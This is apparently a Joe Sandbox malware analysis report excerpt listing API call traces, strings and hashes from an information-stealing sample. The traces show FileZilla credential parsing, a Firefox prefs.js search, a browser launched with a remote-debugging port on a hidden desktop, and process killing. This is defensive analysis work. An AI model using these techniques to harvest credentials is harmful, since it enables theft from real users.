                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6DDF
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 003A6DF2
                              • lstrlen.KERNEL32(00000000), ref: 003A6E01
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6E49
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6E71
                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 003A6E94
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 003A6EA8
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 003A6EC9
                              • LocalFree.KERNEL32(00000000), ref: 003A6ED4
                              • lstrlen.KERNEL32(?), ref: 003A6F6E
                              • lstrlen.KERNEL32(?), ref: 003A6F81
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 2641759534-2314656281
                              • Opcode ID: 20e69ca38340c411cf3c5a1748559156ff904330d33fae1676bcb7fc558ea990
                              • Instruction ID: b956e13f7f114995cab2341ce3d43c237244bd863f315d790c494da44f68293a
                              • Opcode Fuzzy Hash: 20e69ca38340c411cf3c5a1748559156ff904330d33fae1676bcb7fc558ea990
                              • Instruction Fuzzy Hash: 54028031A11A16AFCB22ABB4DC4EEAF7BB9EF15704F095454F802EB241DF34D90587A0
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A4B51
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4B74
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A4B7F
                              • lstrlen.KERNEL32(003C4CA8), ref: 003A4B8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4BA7
                              • lstrcat.KERNEL32(00000000,003C4CA8), ref: 003A4BB3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4BDE
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 003A4BFA
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID: prefs.js
                              • API String ID: 2567437900-3783873740
                              • Opcode ID: 8d34e544d9e0b94bd3347581c4330d9267c2cfed12fc27ba9838979cf7083695
                              • Instruction ID: 950965f7d1bacb0a19ec0573943d5fa6c254a7dffcc56dc6fe3b0afe3b99945d
                              • Opcode Fuzzy Hash: 8d34e544d9e0b94bd3347581c4330d9267c2cfed12fc27ba9838979cf7083695
                              • Instruction Fuzzy Hash: D7923171A11A019FDB26CF29C948B6AB7F5FF46314F1A80ADE809DB2A1D771DC41CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A1291
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A12B4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A12BF
                              • lstrlen.KERNEL32(003C4CA8), ref: 003A12CA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A12E7
                              • lstrcat.KERNEL32(00000000,003C4CA8), ref: 003A12F3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A131E
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 003A133A
                              • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003A135C
                              • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003A1376
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A13AF
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A13D7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A13E2
                              • lstrlen.KERNEL32(003C1794), ref: 003A13ED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A140A
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1416
                              • lstrlen.KERNEL32(?), ref: 003A1423
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1443
                              • lstrcat.KERNEL32(00000000,?), ref: 003A1451
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A147A
                              • StrCmpCA.SHLWAPI(?,00F2DAC8), ref: 003A14A3
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A14E4
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A150D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1535
                              • StrCmpCA.SHLWAPI(?,00F2E2D8), ref: 003A1552
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A1593
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A15BC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A15E4
                              • StrCmpCA.SHLWAPI(?,00F2D9D8), ref: 003A1602
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1633
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A165C
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A1685
                              • StrCmpCA.SHLWAPI(?,00F2D9A8), ref: 003A16B3
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A16F4
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A171D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1745
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A1796
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A17BE
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A17F5
                              • FindNextFileA.KERNEL32(00000000,?), ref: 003A181C
                              • FindClose.KERNEL32(00000000), ref: 003A182B
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                              • String ID:
                              • API String ID: 1346933759-0
                              • Opcode ID: ac5e0573f032610b325092ac884bb234f726ca614dcc2591f1c09ce3f396bb62
                              • Instruction ID: 251854fb810a23b1faf6188276ca2a1b5de144d2c29b802d39a3a34c27dfe7e6
                              • Opcode Fuzzy Hash: ac5e0573f032610b325092ac884bb234f726ca614dcc2591f1c09ce3f396bb62
                              • Instruction Fuzzy Hash: 0C124771A11A069FCF26EF79D889AAF77B8EF55300F054528F846EB250DB34DC458B90
                              APIs
                              • wsprintfA.USER32 ref: 003ACBFC
                              • FindFirstFileA.KERNEL32(?,?), ref: 003ACC13
                              • lstrcat.KERNEL32(?,?), ref: 003ACC5F
                              • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003ACC71
                              • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003ACC8B
                              • wsprintfA.USER32 ref: 003ACCB0
                              • PathMatchSpecA.SHLWAPI(?,00F288D8), ref: 003ACCE2
                              • CoInitialize.OLE32(00000000), ref: 003ACCEE
                                • Part of subcall function 003ACAE0: CoCreateInstance.COMBASE(003BB110,00000000,00000001,003BB100,?), ref: 003ACB06
                                • Part of subcall function 003ACAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 003ACB46
                                • Part of subcall function 003ACAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 003ACBC9
                              • CoUninitialize.COMBASE ref: 003ACD09
                              • lstrcat.KERNEL32(?,?), ref: 003ACD2E
                              • lstrlen.KERNEL32(?), ref: 003ACD3B
                              • StrCmpCA.SHLWAPI(?,003BCFEC), ref: 003ACD55
                              • wsprintfA.USER32 ref: 003ACD7D
                              • wsprintfA.USER32 ref: 003ACD9C
                              • PathMatchSpecA.SHLWAPI(?,?), ref: 003ACDB0
                              • wsprintfA.USER32 ref: 003ACDD8
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 003ACDF1
                              • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 003ACE10
                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 003ACE28
                              • CloseHandle.KERNEL32(00000000), ref: 003ACE33
                              • CloseHandle.KERNEL32(00000000), ref: 003ACE3F
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003ACE54
                              • lstrcpy.KERNEL32(00000000,?), ref: 003ACE94
                              • FindNextFileA.KERNEL32(?,?), ref: 003ACF8D
                              • FindClose.KERNEL32(?), ref: 003ACF9F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                              • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 3860919712-2388001722
                              • Opcode ID: 4bb1ac1bf1a0a2275938d9814c1be12c296e7d629129b926851359d571956408
                              • Instruction ID: ef0cdadc3884e351876b06072639889d566110da531f0ad747449bbdd6c5bc5f
                              • Opcode Fuzzy Hash: 4bb1ac1bf1a0a2275938d9814c1be12c296e7d629129b926851359d571956408
                              • Instruction Fuzzy Hash: E9C14F72910619AFDB21DF64DC49EEE77B9EF55300F044598F50AA7280EE30AE58CF90
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A1291
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A12B4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A12BF
                              • lstrlen.KERNEL32(003C4CA8), ref: 003A12CA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A12E7
                              • lstrcat.KERNEL32(00000000,003C4CA8), ref: 003A12F3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A131E
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 003A133A
                              • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003A135C
                              • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003A1376
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A13AF
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A13D7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A13E2
                              • lstrlen.KERNEL32(003C1794), ref: 003A13ED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A140A
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1416
                              • lstrlen.KERNEL32(?), ref: 003A1423
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1443
                              • lstrcat.KERNEL32(00000000,?), ref: 003A1451
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A147A
                              • StrCmpCA.SHLWAPI(?,00F2DAC8), ref: 003A14A3
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A14E4
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A150D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1535
                              • StrCmpCA.SHLWAPI(?,00F2E2D8), ref: 003A1552
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A1593
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A15BC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A15E4
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A1796
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A17BE
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A17F5
                              • FindNextFileA.KERNEL32(00000000,?), ref: 003A181C
                              • FindClose.KERNEL32(00000000), ref: 003A182B
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                              • String ID:
                              • API String ID: 1346933759-0
                              • Opcode ID: 339e4c0627378969132cc0eaddb4b910b70dc56a537cb27cc3bfa0b95799b2ec
                              • Instruction ID: 84a39a0fa13f5742a7b0d6bb731a93324820ae15bc7fa15749d24c09283f7299
                              • Opcode Fuzzy Hash: 339e4c0627378969132cc0eaddb4b910b70dc56a537cb27cc3bfa0b95799b2ec
                              • Instruction Fuzzy Hash: B4C15831A11A06AFCF22EF69DC89AAF77B8EF55300F054528F846AB251DB34DC55CB90
                              APIs
                              • memset.MSVCRT ref: 00399790
                              • lstrcat.KERNEL32(?,?), ref: 003997A0
                              • lstrcat.KERNEL32(?,?), ref: 003997B1
                              • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 003997C3
                              • memset.MSVCRT ref: 003997D7
                                • Part of subcall function 003B3E70: lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B3EA5
                                • Part of subcall function 003B3E70: lstrcpy.KERNEL32(00000000,00F2EEB0), ref: 003B3ECF
                                • Part of subcall function 003B3E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0039134E,?,0000001A), ref: 003B3ED9
                              • wsprintfA.USER32 ref: 00399806
                              • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00399827
                              • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00399844
                                • Part of subcall function 003B46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003B46B9
                                • Part of subcall function 003B46A0: Process32First.KERNEL32(00000000,00000128), ref: 003B46C9
                                • Part of subcall function 003B46A0: Process32Next.KERNEL32(00000000,00000128), ref: 003B46DB
                                • Part of subcall function 003B46A0: StrCmpCA.SHLWAPI(?,?), ref: 003B46ED
                                • Part of subcall function 003B46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 003B4702
                                • Part of subcall function 003B46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 003B4711
                                • Part of subcall function 003B46A0: CloseHandle.KERNEL32(00000000), ref: 003B4718
                                • Part of subcall function 003B46A0: Process32Next.KERNEL32(00000000,00000128), ref: 003B4726
                                • Part of subcall function 003B46A0: CloseHandle.KERNEL32(00000000), ref: 003B4731
                              • lstrcat.KERNEL32(00000000,?), ref: 00399878
                              • lstrcat.KERNEL32(00000000,?), ref: 00399889
                              • lstrcat.KERNEL32(00000000,003C4B60), ref: 0039989B
                              • memset.MSVCRT ref: 003998AF
                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003998D4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00399903
                              • StrStrA.SHLWAPI(00000000,00F2F6A0), ref: 00399919
                              • lstrcpyn.KERNEL32(005C93D0,00000000,00000000), ref: 00399938
                              • lstrlen.KERNEL32(?), ref: 0039994B
                              • wsprintfA.USER32 ref: 0039995B
                              • lstrcpy.KERNEL32(?,00000000), ref: 00399971
                              • Sleep.KERNEL32(00001388), ref: 003999E7
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391557
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391579
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 0039159B
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 003915FF
                                • Part of subcall function 003992B0: strlen.MSVCRT ref: 003992E1
                                • Part of subcall function 003992B0: strlen.MSVCRT ref: 003992FA
                                • Part of subcall function 003992B0: strlen.MSVCRT ref: 00399399
                                • Part of subcall function 003992B0: strlen.MSVCRT ref: 003993E6
                                • Part of subcall function 003B4740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 003B4759
                                • Part of subcall function 003B4740: Process32First.KERNEL32(00000000,00000128), ref: 003B4769
                                • Part of subcall function 003B4740: Process32Next.KERNEL32(00000000,00000128), ref: 003B477B
                                • Part of subcall function 003B4740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 003B479C
                                • Part of subcall function 003B4740: TerminateProcess.KERNEL32(00000000,00000000), ref: 003B47AB
                                • Part of subcall function 003B4740: CloseHandle.KERNEL32(00000000), ref: 003B47B2
                                • Part of subcall function 003B4740: Process32Next.KERNEL32(00000000,00000128), ref: 003B47C0
                                • Part of subcall function 003B4740: CloseHandle.KERNEL32(00000000), ref: 003B47CB
                              • CloseDesktop.USER32(?), ref: 00399A1C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                              • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                              • API String ID: 958055206-1862457068
                              • Opcode ID: 4367f65a275d060b0b35d51f8d448022f68edb91904d87a324191916796343df
                              • Instruction ID: 3358b4e8b8c569d08df09850cd24186334687c6ed2ffd2e4d1bfdb94945ff287
                              • Opcode Fuzzy Hash: 4367f65a275d060b0b35d51f8d448022f68edb91904d87a324191916796343df
                              • Instruction Fuzzy Hash: 22917371A10608AFDB11DFA4DC89FEE77B8AF58700F104599F609AB181DF70AE44CBA4
                              APIs
                              • wsprintfA.USER32 ref: 003AE22C
                              • FindFirstFileA.KERNEL32(?,?), ref: 003AE243
                              • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003AE263
                              • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003AE27D
                              • wsprintfA.USER32 ref: 003AE2A2
                              • StrCmpCA.SHLWAPI(?,003BCFEC), ref: 003AE2B4
                              • wsprintfA.USER32 ref: 003AE2D1
                                • Part of subcall function 003AEDE0: lstrcpy.KERNEL32(00000000,?), ref: 003AEE12
                              • wsprintfA.USER32 ref: 003AE2F0
                              • PathMatchSpecA.SHLWAPI(?,?), ref: 003AE304
                              • lstrcat.KERNEL32(?,00F2F980), ref: 003AE335
                              • lstrcat.KERNEL32(?,003C1794), ref: 003AE347
                              • lstrcat.KERNEL32(?,?), ref: 003AE358
                              • lstrcat.KERNEL32(?,003C1794), ref: 003AE36A
                              • lstrcat.KERNEL32(?,?), ref: 003AE37E
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 003AE394
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AE3D2
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AE422
                              • DeleteFileA.KERNEL32(?), ref: 003AE45C
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391557
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391579
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 0039159B
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 003915FF
                              • FindNextFileA.KERNEL32(00000000,?), ref: 003AE49B
                              • FindClose.KERNEL32(00000000), ref: 003AE4AA
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                              • String ID: %s\%s$%s\*
                              • API String ID: 1375681507-2848263008
                              • Opcode ID: b477eb4d27df300f30e8c963d56d5efd43f7d64a51edae028d3cae45ae68823d
                              • Instruction ID: d47c02043ee684123685ab22e3888cda0dfc47bcfebf2183f84dfea96460d211
                              • Opcode Fuzzy Hash: b477eb4d27df300f30e8c963d56d5efd43f7d64a51edae028d3cae45ae68823d
                              • Instruction Fuzzy Hash: C4814D72900619AFCB21EF64DC49EEF77B9FF58300F044998B51A97141DA35AA58CFA0
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003916E2
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00391719
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039176C
                              • lstrcat.KERNEL32(00000000), ref: 00391776
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003917A2
                              • lstrcpy.KERNEL32(00000000,?), ref: 003918F3
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003918FE
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat
                              • String ID: \*.*
                              • API String ID: 2276651480-1173974218
                              • Opcode ID: c2650e485b5b0ae2d0a8356b58981ed0967ba615950bb3461d7e51c2fb748e1a
                              • Instruction ID: fa2c8c824928fd11d8788ef7c8f98f287e5ffb408b30e3c4b05aea1b7811302e
                              • Opcode Fuzzy Hash: c2650e485b5b0ae2d0a8356b58981ed0967ba615950bb3461d7e51c2fb748e1a
                              • Instruction Fuzzy Hash: 5B813031912A1BAFCF23EFA8D989EAF77B9AF14700F051124F805AB251DB309D15CB91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003ADD45
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003ADD4C
                              • wsprintfA.USER32 ref: 003ADD62
                              • FindFirstFileA.KERNEL32(?,?), ref: 003ADD79
                              • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003ADD9C
                              • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003ADDB6
                              • wsprintfA.USER32 ref: 003ADDD4
                              • DeleteFileA.KERNEL32(?), ref: 003ADE20
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 003ADDED
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391557
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391579
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 0039159B
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 003915FF
                                • Part of subcall function 003AD980: memset.MSVCRT ref: 003AD9A1
                                • Part of subcall function 003AD980: memset.MSVCRT ref: 003AD9B3
                                • Part of subcall function 003AD980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003AD9DB
                                • Part of subcall function 003AD980: lstrcpy.KERNEL32(00000000,?), ref: 003ADA0E
                                • Part of subcall function 003AD980: lstrcat.KERNEL32(?,00000000), ref: 003ADA1C
                                • Part of subcall function 003AD980: lstrcat.KERNEL32(?,00F2F670), ref: 003ADA36
                                • Part of subcall function 003AD980: lstrcat.KERNEL32(?,?), ref: 003ADA4A
                                • Part of subcall function 003AD980: lstrcat.KERNEL32(?,00F2DA98), ref: 003ADA5E
                                • Part of subcall function 003AD980: lstrcpy.KERNEL32(00000000,?), ref: 003ADA8E
                                • Part of subcall function 003AD980: GetFileAttributesA.KERNEL32(00000000), ref: 003ADA95
                              • FindNextFileA.KERNEL32(00000000,?), ref: 003ADE2E
                              • FindClose.KERNEL32(00000000), ref: 003ADE3D
                              • lstrcat.KERNEL32(?,00F2F980), ref: 003ADE66
                              • lstrcat.KERNEL32(?,00F2E498), ref: 003ADE7A
                              • lstrlen.KERNEL32(?), ref: 003ADE84
                              • lstrlen.KERNEL32(?), ref: 003ADE92
                              • lstrcpy.KERNEL32(00000000,?), ref: 003ADED2
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                              • String ID: %s\%s$%s\*
                              • API String ID: 4184593125-2848263008
                              • Opcode ID: 990c210252e26c2293214c1ec2f90069b02456abb9d025d3dcd3c3261900f891
                              • Instruction ID: 5737fab87e288639b21e9913ed7c4f5dd0ff5b97deeecd36162b685fba19c784
                              • Opcode Fuzzy Hash: 990c210252e26c2293214c1ec2f90069b02456abb9d025d3dcd3c3261900f891
                              • Instruction Fuzzy Hash: 86614E72910609AFCB21EB64DC89EEE77B9FF58300F0045A8F546A7251DF34AA58DB90
                              APIs
                              • wsprintfA.USER32 ref: 003AD54D
                              • FindFirstFileA.KERNEL32(?,?), ref: 003AD564
                              • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003AD584
                              • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003AD59E
                              • lstrcat.KERNEL32(?,00F2F980), ref: 003AD5E3
                              • lstrcat.KERNEL32(?,00F2F960), ref: 003AD5F7
                              • lstrcat.KERNEL32(?,?), ref: 003AD60B
                              • lstrcat.KERNEL32(?,?), ref: 003AD61C
                              • lstrcat.KERNEL32(?,003C1794), ref: 003AD62E
                              • lstrcat.KERNEL32(?,?), ref: 003AD642
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AD682
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AD6D2
                              • FindNextFileA.KERNEL32(00000000,?), ref: 003AD737
                              • FindClose.KERNEL32(00000000), ref: 003AD746
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 50252434-4073750446
